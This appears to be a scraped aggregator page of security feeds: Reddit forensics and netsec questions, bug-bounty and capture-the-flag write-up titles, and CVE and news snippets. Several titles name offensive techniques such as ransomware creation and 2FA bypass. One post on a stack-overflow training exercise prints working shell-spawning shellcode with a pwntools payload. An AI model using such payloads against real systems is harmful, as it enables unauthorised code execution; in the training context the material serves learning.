    Hi Team, Need suggestions for any websites where I can find a reference scenario of a cybercrime where you have to do a computer forensics on a victims PC. For example a hacking incident, you have to verify of investigate how he/she was hacked. The report shall include the creation of a hypothetical scenario of a crime committed involving the said electronic device, as well as, a detailed description of the forensic examination, tools used, procedure, and findings, evidenced with the necessary screenshots and ensure all screenshots have the necessary verifiable names. This is a school project for my cybersecurity program and it is only my term 1. ​ Thank you so much! submitted by /u/bankshot15 [link] [comments]
    Avoid modifying the smartphone evidence
    To present forensic analysis in the court, we can't modify smarphone evidence, although i have put android phone in airplane mode, i still worry about modifying smartphone data during cellebrite ufed phone extraction, how to avoid tempate evidence during extraction? for linux image analysis, i can mount as read only, how about smartphone? submitted by /u/cyberfo [link] [comments]
    How do I get Laptop serial number from E01 image?
    Yep..someone fucked up the chain of custody forms submitted by /u/MasterBet [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]
    dns posioning or dns hijacking
    we encounter a lot of packages with small ttl in our pcap files, is this the symptom of DNS poisoning attack, or dns hijacking or other dns attack, like ddos? submitted by /u/cyberfo [link] [comments]
    how to detect C2 communication from log
    how to detect C2 communication from log, we have method to detect beaconing, but now has difficulty in detect Command and control command, we have no clue, anyone know how to detect it through splunk log? submitted by /u/cyberfo [link] [comments]
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

    基于零信任的远程办公安全技术落地和应用
    基于零信任的远程办公安全方案,可以摆脱主机,轻松保证远程办公业务的连续性。
    工信部发布《车联网网络安全和数据安全标准体系建设指南》
    到2023年底,初步构建起车联网网络安全和数据安全标准体系;到2025年,形成较为完善的车联网网络安全和数据安全标准体系。
    揭秘APT36组织的CapraRat恶意软件
    我们会持续的介绍一些国际上臭名昭著APT组织,让我们更加了解和规避这些恶意的恶意软件。
    网络安全漏洞分析小结
    这里从漏洞点出发,分析漏洞,从中学习一些白盒挖掘漏洞的思路。
    CISA在其积极利用的漏洞目录中增加了95个新漏洞
    美国网络安全和基础设施安全局 (CISA) 本周在其利用漏洞目录中增加了95个新的安全漏洞,使其可利用的漏洞总数达到 478 个。
    都2022年了,密码管理器还安全吗?
    本文将重新审视密码管理器,为大家解答关于密码管理器的若干重要问题。

  • Open

    Telegram kanallarında arama yapmak için Google hacking’i kullanmak
    Telegram’da Putin yanlısı kanallar arıyordum, Google Dork’u kullanma. Bunun da Google hacking’i kullanmanın pratik bir örneği olduğunu… Continue reading on Medium »
    10 OSINT Tools Hackers Need to Know About
    Open source intelligence is a vital task for the red team and blue team alike. Here are some of the most useful OSINT tools. Continue reading on Medium »
    Send Google Alert To Slack
    Automatic Free Crawler By Google Continue reading on Medium »
    Final Recon — OSINT Tool for All-In-One Web Reconnaissance
    Final Recon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be… Continue reading on Medium »
  • Open

    help with making money
    Hey everyone I would like to join the security game. i have a background in programming, how computers and software works what is the fastest way to make money in the security field? I'm here not only for money i really like this field but i need to make money fast i have pills to pay and i can't get a job appreciate any help and guide submitted by /u/timet0fly [link] [comments]
    AlienVault OSSIM - Step by Step Tuning after Installation
    Hi there, I'm interested to test this SIEM for education purposes. I downloaded the latest version from the official site and installed it on my VMware. But I stumbled upon the fact that I do not fully understand how best to configure everything. I did not find any deep step-by-step documentation on the official portal. And most likely I can miss a lot through undetailed documentation. Do I understand correctly that Suricata works out of the box? I don't need to install an agent on a Windows host? When I installed HIDS on my Windows host, I had a lot of weird events where the destination IP is displayed - 0.0.0.0. And I don't even know how to make a rule, so these events are not reflected. I googled and other people had such problems and there is no solution. Who works a lot with this SIEM, perhaps from your experience, you could share recommendations on what to do, what to do after installing this SIEM. I also haven't fully figured out how to run FIM. submitted by /u/athanielx [link] [comments]
    Is it possible to be hacked by private networks/hidden SSIDS near your area?
    I believe my neighbors are watching me using private networks. I have have an app that shows hidden SSIDs. I think they are using these networks to see and listen to what I'm doing on my devices. submitted by /u/AshuraSenkuu [link] [comments]
    Potential drive-by 0-click 0-day on chrome
    There is an on going bug in chrome that allows attackers to download files in the background into the victims machine without triggering any gui updates, I first experienced this about two moths ago when I was trying to close the browser only to be interrupted by a chrome prompt informing me that there are ongoing downloads in the background that weren't started by me and display no sign of the downloading process on chrome's gui. I was a bit alarmed but I didn't pay it too much attention. Then I got curious when yesterday I had the same experience again, this time obviously I clicked 'continue downloads', I was taken to chrome download page where I found that chrome had intercepted and flagged a 'malicious file' and it was offering me to either 'keep' or 'discard' said file, regrettably …
  • Open

    Frelatage: A new Coverage-Based Python fuzzing library
    Hello everyone ! I am a 21 year old french cybersecurity enthusiast and I would like to share with you Frelatage, which is a tool I wrote ! It is a coverage-based Python fuzzing library which can be used to fuzz python code. The development of Frelatage was inspired by various other fuzzers, including AFL/AFL++, Atheris and PyFuzzer.The main purpose of the project is to take advantage of the best features of these fuzzers and gather them together into a new tool in order to efficiently fuzz python applications. Please note that the project is still in early alpha, and its development is very active, so any advice or suggestion is welcomed ! Install: https://github.com/Rog3rSm1th/Frelatage https://i.redd.it/m88potyk9tl81.gif submitted by /u/FrenchFuzzer [link] [comments]
    Shellcode Buff Overflow Question
    As I was going through protostar Phoenix Stack overflows I came across something on the Stack-Five exercise that I don't quite understand on amd64. https://exploit.education/phoenix/stack-five/ Basically I can get the exploit to work when the nop sled is 80 characters long but when I have it 88 characters long I get a seg fault. This Works t.sendline('\x90'*80 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*29 + pwn.p64(0x7fffffffe5d0)) ​ This gives a segfault t.sendline('\x90'*88 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*21 + pwn.p64(0x7fffffffe5d0)) ​ Does anyone know why the second one doesn't work? submitted by /u/Jasonsaccount [link] [comments]
  • Open

    Backdooring WordPress using PyShell
    submitted by /u/jonas02 [link] [comments]
    Escaping privileged containers for fun.
    submitted by /u/JordyZomer [link] [comments]
  • Open

    Going beyond the surface: Vulns that pay well
    These days bug bounty hunters have been finding many low hanging fruits and a lot of them want to go beyond those bugs. This blog is for… Continue reading on InfoSec Write-ups »
    All About Access Control Part-1
    Hello Myself Manan Aggarwal a student from the BTech CSE is here to Present you the Blog about the All About the Access Control Part-1… Continue reading on Medium »
    A short story of IDOR for your perspective
    Hi all, I hope all is well. In this story, I’ll explain an idor bug which I found in a private bug bounty program. This story will very… Continue reading on Medium »
    SSRFire - an automated SSRF finder
    An automated SSRF finder. Just give the domain name and your server and chill! ;) It also has options to find XSS and open redirects. Continue reading on Medium »
    WhatsApp Bug Bounty: Bypassing biometric authentication using voip
    Bypassing biometric authentication just by making a call and access the app completely Continue reading on InfoSec Write-ups »
    HOF In 3 Minute Using Low Hanging Fruits
    Hello, Security Guys & Hacker In this Write Up I am Going to tell you about Continue reading on Medium »
    Response Manipulation leads to Account Takeover
    This is a short story about my recent bug hunting on a private program. This program mainly relies on OTP to check user’s authentication… Continue reading on Techiepedia »
    Weak Registration Implementation
    Let us learn some P4 bugs Continue reading on Medium »
  • Open

    SecWiki News 2022-03-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Unrecoverable and recoverable windows file
    In my forensic image, some deleted files I can recover, some can not. How Encase determine which files are not recoverable internally? For data carving, how Encase retrieve internally those files, are they use same techniques compared with recover deleted files? thanks. submitted by /u/cyberfo [link] [comments]
    X-ways linux image analysis
    in X-ways, if I browse the root directory of image, i found free space, idle space and slack space, can anyone explain what's the different among these these three spaces? in filter attribute, there are SUID/SGID, symlink and special file. I thought suid file are special file, what are the special file X-ways refer to ? symlink means hardlink or soft link? submitted by /u/cyberfo [link] [comments]
    Physical acquisition on unrootable phone?
    Hi all. I'm an intern in computer forensics and I'm trying to perform a physical acquisition on an oppo phone which is unfortunately unrootable as far as I know. I have Cellebrite UFED and MobilEdit but both of them require rooted devices. Any advice for this case? Tysm submitted by /u/juneflorence [link] [comments]
  • Open

    [Cullinan #28] Add RPO and SSJI
    컬리넌 로그 #28입니다. 이번에는 RPO와 SSJI를 추가했고, 기존 항목들 일부 수정사항이 있었습니다. Add Relative Path Overwrite (RPO) Add Server-Side Javascript Injection (SSJI) Update SSRF (Add URL: Prefix) Update WebSocket Connection Smuggling (Add https payload) 이제 약간 미뤄왔던 큰 작업 하나를 해야할 것 같습니다. 다음에는 XSS 쪽 기존 포스팅을 싹 정리해서… 업데이트할 예정입니다 😅
  • Open

    Evading Network Defense with Protocol Manipulation
    Signature based intrusion detection or prevention systems, will detect malicious activity through a predefined signature. If a Red Team… Continue reading on Medium »
  • Open

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0
  • Open

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0
  • Open

    The (Mis)Use of Artifact Categories, pt II
    My previous post on this topic presented my thoughts on how the concept of "artifact categories" were being misused. My engagement with artifact categories goes back to 2013, when Corey Harrell implemented his thoughts on categories via auto_rip. I saw, and continue to see, the value in identifying artifact categories, but as I alluded to in my previous post, it really seems that the categories are being misused. Where the artifacts should be viewed as providing an indication of the categories and requiring further analysis (including, but not limited to the population of artifact constellations), instead, the artifacts are often misinterpreted as being emphatic statements of the event or condition occurring. For example, while an entry in the ShimCache or AmCache.hve file should indicate …
    DFIR Reporting
    A request that's been pretty consistent within the industry over time has had to do with reporting. I'd see a request, some responses, someone might ask for a template, and then the exchange would die off...I assumed that it had moved to DMs or offline. Then you'd see the discussion pop up again later, in some other forum. I get it...writing is hard. I have the benefit of having had to write throughout my career, but also of putting intentional, dedicated effort into DFIR reporting, in that I had been very purposeful in seeking feedback from my boss, and incorporating that feedback into report writing. I was able to get to the point of having reports approved with minimal (if any) changes pretty quickly.  As a result, in 2014, Windows Forensic Analysis Toolkit 4/e was published, and in thi…
  • Open

    PSA: reddit appears to be removing posts/comments containing *.ru URLs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Big Collection of 720p Movies, solid speeds, haven't explored all the directories, so I'm marking NSFW just in case.
    submitted by /u/SatansMoisture [link] [comments]
    Classic TV: Various video qualities, decent speeds
    submitted by /u/SatansMoisture [link] [comments]
  • Open

    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.
    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.
  • Open

    webOS Revisited - Even More Mistaken Identities · The Recurity Lablog
    submitted by /u/addelindh [link] [comments]
  • Open

    Question about protecting my data while traveling .
    Traveling a lot this week and was just wondering what kind of vpn you guys use while traveling and any other security measures you may have :) submitted by /u/Savage-shredder [link] [comments]
    Good US based infosec recruiters?
    I never thought I would say this, normally being on the hiring side, but has anyone had positive experience for US-based boutique infosec recruiters that they would recommend? I’ve found several listed in CISO magazine and such but don’t know if any are particularly clue-full. Public or DM is fine, thanks! submitted by /u/venerable4bede [link] [comments]
  • Open

    Cloudflare WAF bypass via Origin IP
    Cloudflare supports more than 16 million Internet attributes and is now one of the most popular WAFs(Web Application Firewalls). A year… Continue reading on Medium »
    Bug Bounty: Open Xmlrpc.php vulnerability on WordPress site.
    what is Xml-RPC? Continue reading on Medium »
  • Open

    SecWiki News 2022-03-05 Review
    高效挖掘反序列化漏洞——GadgetInspector改造 by ourren js安全之ast混淆 by ourren 基于openresty的安全网关开发记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-05 Review
    高效挖掘反序列化漏洞——GadgetInspector改造 by ourren js安全之ast混淆 by ourren 基于openresty的安全网关开发记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    How to collect a forensic image of a VSXI/EXSI that has been infected with ransomware?
    How to collect a forensic image of a VSXI/EXSI that has been infected with ransomware? submitted by /u/rvndomus3r2019 [link] [comments]
    Copying Hard Drive
    I am sending a hard drive I own into Cyber Forensics. If possible, I am looking for software advice to copy the hard drive before sending it in to experts. Additionally, if you have advice for transferring the files from the software to a type of hardware, I would appreciate it. ​ Thanks. submitted by /u/Odd-Switch-1658 [link] [comments]
  • Open

    UK’s vulnerability to corruption uncovered amid slow sanctions response
    Article URL: https://www.theguardian.com/commentisfree/2022/mar/05/uks-vulnerability-to-corruption-uncovered-amid-slow-sanctions-response Comments URL: https://news.ycombinator.com/item?id=30566774 Points: 9 # Comments: 0
  • Open

    Plugins for Persistence (Sublime Text & VS Code)
    submitted by /u/hanbei-undying [link] [comments]
  • Open

    unclaimed subdomain special.rkeeper.ru to takeover from tilda.cc
    Mail.ru disclosed a bug submitted by mainteemoforfun: https://hackerone.com/reports/1045644
  • Open

    FreeBuf早报 | 英伟达71000名员工凭证泄露 ;政协委员建议设立网络安全和数据保护窗口
    英伟达发布了一份报告,承认攻击者从其系统中窃取了员工密码和未披露的英伟达专有信息。
  • Open

    Expat library: libexpat 2.4.7 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_7/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30564782 Points: 1 # Comments: 0
  • Open

    Açık kaynak istihbaratı : Fotoğraflardan ne buluruz?
    Tryhackme: Searchlight — IMINT — Part 2 Continue reading on Medium »

  • Open

    Misinformation, Disinformation and Subterfuge, Part One:
    How I triggered a weaponized Fake-Left Troll Farm meant to harass, target, defame and deplatform prominent Disinformation researchers. Continue reading on Medium »
    Maltego Basics: Building a Network Diagram
    This post is a step-by-step guide to create a network diagram in Maltego. Continue reading on Medium »
    The OSINT Toolkit!
    Baidu Maps http://map.baidu.com/ Continue reading on System Weakness »
    OSINT: Preso “influencer” digital após ser identificado fazendo dancinhas
    Imagina estar fazendo sua dancinha trend no TikoTeko e ser preso logo após? Pois foi o que aconteceu. Continue reading on Medium »
  • Open

    The perils of the “real” client IP [or the many ways to use X-Forwarded-For for incorrectly]
    submitted by /u/yesyoucantrip [link] [comments]
    A Backdoor Lockpick : Reversing Phicomm’s Backdoor Protocols
    submitted by /u/stargravy [link] [comments]
    Hacking Hadoukens: Reverse Engineering a Street Fighter Two Cabinet
    submitted by /u/wrongbaud [link] [comments]
    ICS & OT Risk and Vulnerability Report
    submitted by /u/h4ck3dit [link] [comments]
    Finding an Authorization Bypass on my Own Website - SQL Injection in a Parameterized Query
    submitted by /u/mdulin2 [link] [comments]
    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    submitted by /u/YuvalAvra [link] [comments]
  • Open

    Normal User is able to EXPORT Feature Usage Statistics
    Lark Technologies disclosed a bug submitted by aishkendle: https://hackerone.com/reports/1470076 - Bounty: $500
    Brute force attack of current password on login page by bypassing account limit using IP rotator(https://dashboard.omise.co/signin)
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1466967
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Does bluetooth create a vulnerability for the broadcasting device itself?
    I see how bluetooth is a vulnerability to the data that's being transferred over the connection but does it pose an actual threat to, lets say, a phone's internal data? Or are they just going to be able to listen along to my music? submitted by /u/zeff_05 [link] [comments]
    Airbnb Donations
    Does Airbnb have a robust enough infosec team to prevent Russian hackers from registering fake properties in the Ukraine to take advantage of all the people in America lazy enough to only donate to Ukrainians bthrough reserving Airbnb's? submitted by /u/intentropy [link] [comments]
    Why would an inbound email from a 3rd party have an IP internal to our org in the SPF record?
    I'm looking at an email that was suspected as a phish and for the most part it's fairly benign but there's a few areas in the headers that don't add up for me. The call to action in the email was to update some Site-to-Site VPN addresses to US Bank. Important to note that we don't currently have anything like that established with them, though the support numbers appear to be official and I just don't clearly see where the hook here is yet. The part that confuses me most is that the sender IP listed as the first SPF record is our public NAT address for client VPNs and not even one of our mail servers. The headers do refer to one of our mail servers further down, however it's the wrong IP. I'm new to the org though so may not have all the pieces to the puzzle. Are there simple explanations…
    Utilization - Does Your Organization Care? Do Your Employees Like it in InfoSec?
    Hey Everyone. Moderating this Subreddit throughout the past 6 or so months I have seen the topic come up quite a bit regarding utilization. While Metrics need to be gathered to determine whether an employee does their job or not, having baselines often causes stress, unrealistic expectations, and caveats that often cause issues with this requirement (IE Training on common security topics/trends/New Threat Landscapes) As far as I know, having a growth mindset and focusing on metrics related to security inside the organization is the way to go, and not micromanaging employees on the numbers each one of them push out. I'd be interested to hear others and their thoughts on this, and how it relates to your employees and organization. submitted by /u/Envyforme [link] [comments]
    Dealing with impostor syndrome?
    Leaving it kinda brief, I have around 6 years in Security starting off as a QA and deployment engineer, and later moving on to partners and doing what I consider architecture. Most of my background is focused on SIEM. Scoping out deployments, talking to clients about what to log and understanding their requirements and how to change/modify their environments to match our services offerings etc. Anyway I took a "Security Architect" role at a big 5 firm and definitely realized I'm under prepared. What can I do to make sure I don't get fired? I didn't entirely oversell myself and I was totally open about my experience, I just feeling way overwhelmed with the level everyone else in my group is at. submitted by /u/Kirin-Jack [link] [comments]
    Should I learn gdb or GNU debugger? If yes, then why?
    Idk what to write submitted by /u/The_Intellectualist [link] [comments]
    Software Developer Administrative Rights
    What is everyone else doing to effectively control (remove) the use of administrative rights on workstations development team members use? We’ve pulled local admin rights from general employees years ago without much issue but every time we approach our dev teams to do it it’s just impossible as it too extremely inhibits their work as they legitimately need to do config management for locally installed services (eg IIS) and maybe less legitimately installing “development tools”. I’d add, we do have pro, qa, dev, sandbox environments but the devs still choose to do development on their desktop systems for “performance” reasons which there is some truth to as we give them beefy hardware (tons of ram/top end CPUs). Edit: after some good dialog here seems like common perspective is to put them in an isolated environment such as a VM. Thanks everyone for the discussion. Still monitoring this so chime in with any other thoughts/experience. submitted by /u/clayjk [link] [comments]
    Nvidia Breach
    It looks like there are two certificates now compromised as a result of the Nvidia breach. What if anything should organisations be doing to protect themselves? submitted by /u/annonuk2020 [link] [comments]
  • Open

    CVE-2021-4128: PfSense 2.5.2 Shell Upload
    Article URL: https://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.html Comments URL: https://news.ycombinator.com/item?id=30557143 Points: 10 # Comments: 0
  • Open

    Exposing the Trickbot Malware Gang - An OSINT Analysis
    Based on a yet another recently leaked batch of internal Trickbot malware gang's communication channels I've decided to come up with a proper OSINT analysis on the topic and actually enrich and actually enrich the original information data set including to elaborate more and provide actionable intelligence on the online whereabouts of the Trickbot malware gang's Internet-connected
  • Open

    SecWiki News 2022-03-04 Review
    Mnemosyne:一个高效的水坑攻击调查取证系统 by ourren GoDLP: 敏感信息保护系统 by ourren Make JDBC Attacks Brilliant Again 番外篇 by ourren Attack Flow — Beyond Atomic Behaviors by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-04 Review
    Mnemosyne:一个高效的水坑攻击调查取证系统 by ourren GoDLP: 敏感信息保护系统 by ourren Make JDBC Attacks Brilliant Again 番外篇 by ourren Attack Flow — Beyond Atomic Behaviors by ourren 更多最新文章,请访问SecWiki
  • Open

    New Linux vulnerability affecting cgroups: can containers escape?
    Article URL: https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/ Comments URL: https://news.ycombinator.com/item?id=30556188 Points: 91 # Comments: 58
  • Open

    Data URI(data:) XSS v2
    제가 오래전에 Data URI XSS를 다루는 “Form action + data:를 이용한 XSS Filtering 우회 기법“란 글을 쓴 적이 있었는데요, 오늘은 조금 더 개선된 버전으로 글을 작성해볼까 합니다. Data URI XSS v2 입니다. Portswigger XSS cheatsheet 및 대다수 cheatsheet에선 data:에 대해 잘 다루지 않습니다. embed tag에 대한 XSS도 javascript:alert()만 존재합니다. 과연 이것만 존재할까요? 아니죠 🤩 1 Data URI 우회 패턴을 더 만들기 위해선 이 Data URI에 대해서 좀 더 알아봐야겠죠?
  • Open

    steps to run before analyzing the iphone image
    steps to run before forensic analyze: turn off screenlock, turn off backup, turn off find my iphone, what else? submitted by /u/cyberfo [link] [comments]
    Career Advice
    I've been working in eDiscovery and forensics for about three years, mostly lit support and low-level investigations. I hold CFCE and CCE certs. Currently enrolled in Champlain and I'll be wrapping up my B.S. in Computer Forensics and Digital Investigations. I'm located in an HCOL area and thinking of transitioning to a different company due to pay disparity. IR is in greater demand, so I imagine I'll be able to leverage more money in that field. What steps (training, certs, etc.) should I take to prepare myself if I decide to change my focus to DFIR? submitted by /u/stickyricky714 [link] [comments]
    Trying to MFTExplorer but it returns an error. Any way to circumvent this?
    submitted by /u/KTthemajicgoat [link] [comments]
    Interesting
    submitted by /u/kramps_ [link] [comments]
  • Open

    PORTSWIGGER WEB SECURITY - WEBSOCKETS LAB ÇÖZÜMLERİ
    WebSocket, client ile server arasında veri aktarımını sağlayan çift yönlü ve modern web uygulamalarında yaygın olarak kullanılan HTTP gibi… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CLICKJACKING LAB ÇÖZÜMLERİ
    Clickjacking, saldırgan tarafından web uygulamasında barındırılan zararlı bir bağlantıya, hedef kullanıcının tıklaması sonucunda çeşitli… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CORS (CROSS-ORIGIN RESOURCE SHARING) LAB ÇÖZÜMLERİ
    CORS (Cross-Origin Resource Sharing / Kökenler Arası Kaynak Paylaşımı), belli bir domainin dışındaki kaynaklara kontrollü erişim sağlayan… Continue reading on Medium »
    Gold Bug Bounty Resources | Web Application, Android & iOS Security
    Take your time and start learning from these Resources. Continue reading on Medium »
    The Secret trick for subdomain Enumeration
    Probably the most covered topic in bug bounty hunting and web apps is subdomain enumeration. Continue reading on Medium »
    Bug Bounty Toolkit
    Bug bounty platforms and programs Continue reading on System Weakness »
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    FreeBuf周报 | 英伟达多达1TB数据被盗;丰田因供应商遭受网络攻击而停产
    总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
    Avast 为袭击乌克兰的HermeticRansom发布了免费解密工具
    近日,Avast发布了免费的HermeticRansom勒索软件解密工具,只为帮助遭受勒索威胁的乌克兰受害者恢复数据。
    论一次在简单的渗透测试
    一次简单渗透测试的总结
    国家网信办发布《互联网弹窗信息推送服务管理规定(征求意见稿)》
    《规定》明确指出,在我国境内提供操作系统、终端设备、应用软件、网站等服务的,开展互联网弹窗信息推送服务时应当遵守本规定。

  • Open

    Computer workstation question
    Hello everyone, I know this has been asked before however I’m going to build a forensics workstation for my department; we don’t have a lot of money to throw around to do a dual CPU set up. I was wondering if anyone would recommend the newest I9-12900k CPU for processing, or any other processor for the most efficient in imaging. I mainly use Magnet Axiom and cellabrite. One thing I’m having trouble with is finding a good MOBO, what would you all recommend, I need enough ports for a write blocker and multiple HDDS, and M.2 SSD’s. Thanks submitted by /u/ExiisTT [link] [comments]
    Microsoft Surface Go 2 - Bitlocked and Paladin
    Good day, all! I am working with a MS Surface Go 2. I have/had the PIN to access the device. I I did obtain a memory capture and logical image of the C: drive using FTKi. After obtaining that data, I tried to boot into Paladin but it would not load/boot. I went into the UEFI and disabled the Secure Boot option, knowing this may cause the device to become bitlocked - which it did, but did allow Paladin to boot. As I do 99% phones, this one is throwing me for a loop and I am seeking some guidance. I am now able to image the drive using Paladin, but obviously it will be bitlocked. The recovery key "should" be captured in the RAM, right? And if so, how do I decrypt the data once loaded (or before). I would be using Axiom to load the data. Thanks in advance for any insights and help! submitted by /u/Responsible_Dig_2899 [link] [comments]
    Executed files
    Hi how can I investigate executed malicious file like maldoc or any execruable. How to get the list of artificates? Thanks submitted by /u/0X900 [link] [comments]
    Cellebrite UFED file system extraction
    Does Cellebrite support file system extraction for deleted file? if yes, do we need to root the iphone or Android phone for data extraction? submitted by /u/cyberfo [link] [comments]
    Computer Evidence RecoveryThe Truth About USB Device Serial Numbers – (and the lies your tools tell) - Computer Evidence Recovery
    Quote from article: What we have then discovered, is that in most cases, external portable devices are not properly reported in Windows, at least insofar as what regards a Serial Number. This becomes incredibly problematic when your forensic reports says that the device serial number is “ABCD”, and an opposing expert says it is “EFGH”. Who is right? It is tough to convince a court that your tool is right and the label from the manufacturer is wrong. Are you examining a plastic container? Or are you examining a hard drive? What you do matters. Lives are affected by the work of digital forensics practitioners. https://www.computerpi.com/the-truth-about-usb-device-serial-numbers-and-the-lies-your-tools-tell/ submitted by /u/Erminger [link] [comments]
    detect data exfiltration to USB
    How to detect data exfiltration to external USB drive through $MFT, thanks submitted by /u/cyberfo [link] [comments]
  • Open

    Analysing 3177 organisations to track the 10 most popular email spam and malware filters
    submitted by /u/Jumpy_Resolution3089 [link] [comments]
    SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
    submitted by /u/Goovscoov [link] [comments]
    A Closer Look at the Russian Actors Targeting Organizations in Ukraine
    submitted by /u/CyberMasterV [link] [comments]
    Bypassing Google's Cloud Armor firewall with an 8 KB request
    submitted by /u/almostfamous [link] [comments]
  • Open

    OSINT: Corporate Recon — HTB Academy Walkthrough
    INTRODUCTION: Continue reading on Medium »
    OSINT meydan okumaki
    Tryhackme: Searchlight — IMINT Continue reading on Medium »
    Shodan Dorks — Tras CVE´s , Fotos y Controladores de Tanques de Gasolineras.
    Cualquier amante de la ciberseguridad conoce el motor de búsqueda Shodan, pero ¿sabrías utilizar los parámetros adecuados para “Dorkear… Continue reading on Medium »
    Un apasionado de la ciberseguridad y ciberinteligencia con muchas cosas que contarte.
    ¿Are u re4dy? Continue reading on Medium »
    OSINT ON GMAIL ACCOUNTS
    Google Hunt Tool Continue reading on System Weakness »
    Metagoofil
    (LET’S EXPOLRE HIDDEN FILES) Continue reading on Medium »
  • Open

    Ukrayna’nın Siber Savunması Hacken’ın Rolü: Dyma Budorin ile En Son AMA
    Hacken ekibi kısa süre önce, Rusya’nın Ukrayna’yı işgalinin başlangıcından bu yana CEO’muz Dyma Budorin ile ilk AMA oturumunu düzenledi… Continue reading on Medium »
    Host Header Injection Leads To Pre-Account Takeover Worth 100$
    Self Introduction : Continue reading on Medium »
    Weakly Typed SQL Injection
    Programming languages come in two categories: Hard/Strong Typed Soft/Weak Typed Continue reading on Techiepedia »
    An Clickjacking - Which Rewarded me with 275$
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Found API Token on js file
    Continue reading on Medium »
  • Open

    Uber Test Report 20220301
    Uber disclosed a bug submitted by johnzilla313: https://hackerone.com/reports/1496297
    Subdomain Takeover at https://new.rubyonrails.org/
    Ruby on Rails disclosed a bug submitted by nagli: https://hackerone.com/reports/1429148
    stand.pw.mail.ru xss
    Mail.ru disclosed a bug submitted by smallyu: https://hackerone.com/reports/1400197
  • Open

    (1st post) Atari FTP Archive : Atari/8bit/demoscene related material since 2002. 845GB in 938689 files
    submitted by /u/Pablouchka [link] [comments]
    Bald Actors
    https://www.baldactors.com/wp-content/uploads/2016/03/ submitted by /u/SnooObjections8515 [link] [comments]
    Was searching funnies...
